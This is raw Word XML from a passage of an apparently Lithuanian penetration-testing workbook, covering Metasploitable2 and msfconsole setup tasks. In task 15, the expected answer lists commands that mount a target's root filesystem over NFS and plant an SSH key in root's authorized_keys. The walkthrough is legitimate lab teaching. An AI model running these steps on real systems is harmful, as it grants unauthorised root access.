            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FA19BA9" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Watobo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DC2D229" w14:textId="2FEA986A" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="2EFF60DD" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> ‎Watobo‎‎ leidžia saugumo specialistams atlikti labai efektyvius, pusiau automatizuotus žiniatinklio programų saugumo auditus ir yra geras įrankis atrasti tam tikrus netinkamus konfigūravimus, be kitų audito funkcijų, kurias mėgsta XSS ir SQLi.‎</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06052C1D" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> https://sourceforge.net/projects/watobo/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7E280778" w14:textId="77777777" w:rsidTr="677D82DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59DF7240" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C2ED9D0" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C66F539" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74DA84DD" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D860D7" w:rsidRPr="005A5C28" w14:paraId="5492C3AF" w14:textId="77777777" w:rsidTr="677D82DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60B38A17" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62C58C2A" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F9F121B" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24867066" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AEB3E98" w14:textId="16EEC825" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="007D6C3C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49FE6476" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C"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13 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDODAMIESI VIRTUALIZAVUI SKIRTA PROGRAMINE ĮRANGA PARSISIŲSKITE IR PALEISKITE METASPLOITABLE2 VIRTUALIĄ APLINKĄ. PATEIKITE OPERACINĖS SISTEMOS DARBALAUKIO EKRANO VAIZDĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44699C3B" w14:textId="77777777" w:rsidR="00D94CE4" w:rsidRPr="005A5C28" w:rsidRDefault="00D94CE4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5680C6A2" w14:textId="3C32A1D6" w:rsidR="00FA6A57" w:rsidRPr="005A5C28" w:rsidRDefault="00FA6A57"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ATSAKYMO PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="001A2230" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D94CE4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="001A2230" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D94CE4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255111FD" w14:textId="77777777" w:rsidR="00FA6A57" w:rsidRPr="005A5C28" w:rsidRDefault="18430D4D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="408DD503" wp14:editId="5FEB377A">
            <wp:extent cx="4876802" cy="31718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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId260">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4876802" cy="3171825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="322BE849" w14:textId="5CED69A4" w:rsidR="00FA6A57" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00FA6A57" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. OS Linux, Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597AF609" w14:textId="77777777" w:rsidR="00FA6A57" w:rsidRPr="005A5C28" w:rsidRDefault="00FA6A57"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5D3D95FA" w14:textId="77777777" w:rsidR="00FA6A57" w:rsidRPr="005A5C28" w:rsidRDefault="00FA6A57" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0092CDDB" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C"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14 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDODAMIESI VIRTUALIZAVUI SKIRTA PROGRAMINE ĮRANGA PALEISKITE ARBA ĮDIEKITE VIENĄ IŠ ATSPARUMO TESTAVIMUI SKIRTŲ OPERACINIŲ SISTEMŲ. VEIKIANČIOJE OPERACINĖJE SISTEMOJE ĮDIEKITE IR PALEISKITE ĮRANKĮ „MSFCONSOLE“. PATEIKITE VEIKIANČIO ĮRANKIO „MSFCONSOLE“ EKRANO VAIZDĄ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B7E22" w14:textId="77777777" w:rsidR="00D94CE4" w:rsidRPr="005A5C28" w:rsidRDefault="00D94CE4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F120AC0" w14:textId="6942F29D" w:rsidR="00FA6A57" w:rsidRPr="005A5C28" w:rsidRDefault="00FA6A57"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ATSAKYMO PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00D94CE4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02334E55" w14:textId="77777777" w:rsidR="00FA6A57" w:rsidRPr="005A5C28" w:rsidRDefault="30540CE3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2D2F1A" wp14:editId="71E7CEDD">
            <wp:extent cx="5004434" cy="276275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004434" cy="2762755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0550B98C" w14:textId="3EEC0037" w:rsidR="00FA6A57" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00FA6A57" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. OS Kalilinux, Metasploit Framework programinė įranga</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EAD8DA" w14:textId="0F7A2718" w:rsidR="00FA6A57" w:rsidRPr="005A5C28" w:rsidRDefault="00FA6A57"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5C3A85CE" w14:textId="4C2C119E" w:rsidR="00212F58" w:rsidRPr="005A5C28" w:rsidRDefault="00212F58" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D22964" w14:textId="6A56F840" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C"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15 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PAŽEIDŽIAMUMŲ IŠNAUDOJIMAS NR.1.</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LINUX TERMINALO PANAUDOJIMAS IR NFS PASLAUGOS IŠNAUDOJIMAS GAUNANT PRIVILEGIJUOTO VARTOTOJO TEISES.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01321EC5" w14:textId="77777777" w:rsidR="00D94CE4" w:rsidRPr="005A5C28" w:rsidRDefault="00D94CE4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51ACB5CF" w14:textId="33B1E3ED" w:rsidR="00212F58" w:rsidRPr="005A5C28" w:rsidRDefault="00410814" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ATSAKYMAS</w:t>
      </w:r>
      <w:r w:rsidR="001A2230" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D94CE4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="001A2230" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D94CE4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3109A860" w14:textId="7A6C5443" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"># rlogin -l root </w:t>
      </w:r>
      <w:r w:rsidR="00B80AE2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8D3A13" w14:textId="212E31C4" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"># rpcinfo -p </w:t>
      </w:r>
      <w:r w:rsidR="00B80AE2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F9C483" w14:textId="73E24A73" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"># showmount -e </w:t>
      </w:r>
      <w:r w:rsidR="00B80AE2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F4DF15" w14:textId="77777777" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># ssh-keygen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F0E75" w14:textId="77777777" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># mkdir /tmp/r00t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A7293" w14:textId="35075A50" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"># mount -t nfs </w:t>
      </w:r>
      <w:r w:rsidR="00B80AE2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.160.131</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:/ /tmp/r00t/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A4399" w14:textId="77777777" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># cat ~/.ssh/id_rsa.pub &gt;&gt; /tmp/r00t/root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10502864" w14:textId="77777777" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
